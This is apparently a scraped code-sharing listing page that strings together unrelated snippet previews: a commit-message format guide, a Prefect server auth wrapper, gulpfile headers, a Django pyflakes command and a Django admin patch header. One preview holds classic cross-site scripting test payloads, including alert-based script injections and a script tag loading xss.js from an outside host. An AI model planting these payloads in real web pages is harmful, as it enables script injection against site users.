See how a minor change to your commit message style can make you a better programmer.
Format: <type>(<scope>): <subject>
<scope> is optional
| """A simple wrapper for prefect server, with apikey and basic auth check. | |
| usage: | |
| ```bash | |
| # Allow prefect cli to access the server with same PREFECT_API_KEY. | |
| PREFECT_API_KEY=XX | |
| # base64 encoded `username:password`. Allow users to access the server with user:password. | |
| PREFECT_BASIC_AUTH=XX | |
| # start server | |
| uvicorn --host $PREFECT_SERVER_API_HOST --port $PREFECT_SERVER_API_PORT --factory server:create_auth_app |
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; | |
| alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- | |
| ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| VM239:3 '';!--"<XSS>=&{()} | |
| VM239:3 <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| VM239:3 <IMG SRC="javascript:alert('XSS');"> |
| //Based on gulpfile.js from Google Web Starter Kit. | |
| //https://github.com/google/web-starter-kit | |
| 'use strict'; | |
| // Include Gulp & Tools We'll Use | |
| var gulp = require('gulp'); | |
| var $ = require('gulp-load-plugins')(); | |
| var del = require('del'); | |
| var runSequence = require('run-sequence'); | |
| var browserSync = require('browser-sync'); |
(by @andrestaltz)
If you prefer to watch video tutorials with live-coding, then check out this series I recorded with the same contents as in this article: Egghead.io - Introduction to Reactive Programming.
| 'use strict'; | |
| var gulp = require('gulp'); | |
| var gutil = require('gulp-util'); | |
| var del = require('del'); | |
| var uglify = require('gulp-uglify'); | |
| var gulpif = require('gulp-if'); | |
| var exec = require('child_process').exec; | |
| var notify = require('gulp-notify'); |
| import ast | |
| import os | |
| from pyflakes import checker, messages | |
| import sys | |
| from django.conf import settings | |
| from django.core.management.base import BaseCommand | |
| # BlackHole, PySyntaxError and checking based on | |
| # https://github.com/patrys/gedit-pyflakes-plugin.git |
| Author: | Baiju Muthukadan |
|---|---|
| Email: | baiju.m.mail AT gmail.com |
| Version: | 0.3.2 |
| From bbb53d927c0949246c1735baaf34aa4261cfbb3c Mon Sep 17 00:00:00 2001 | |
| From: Vlad Bokov <[email protected]> | |
| Date: Tue, 5 Jul 2011 04:14:42 +0700 | |
| Subject: [PATCH] nested sets (level<=3) support | |
| --- | |
| django/contrib/admin/options.py | 36 +++++++++++++++ | |
| .../admin/templates/admin/edit_inline/nested.html | 48 ++++++++++++++++++++ | |
| .../admin/templates/admin/edit_inline/tabular.html | 13 +++++- | |
| 3 files changed, 96 insertions(+), 1 deletions(-) |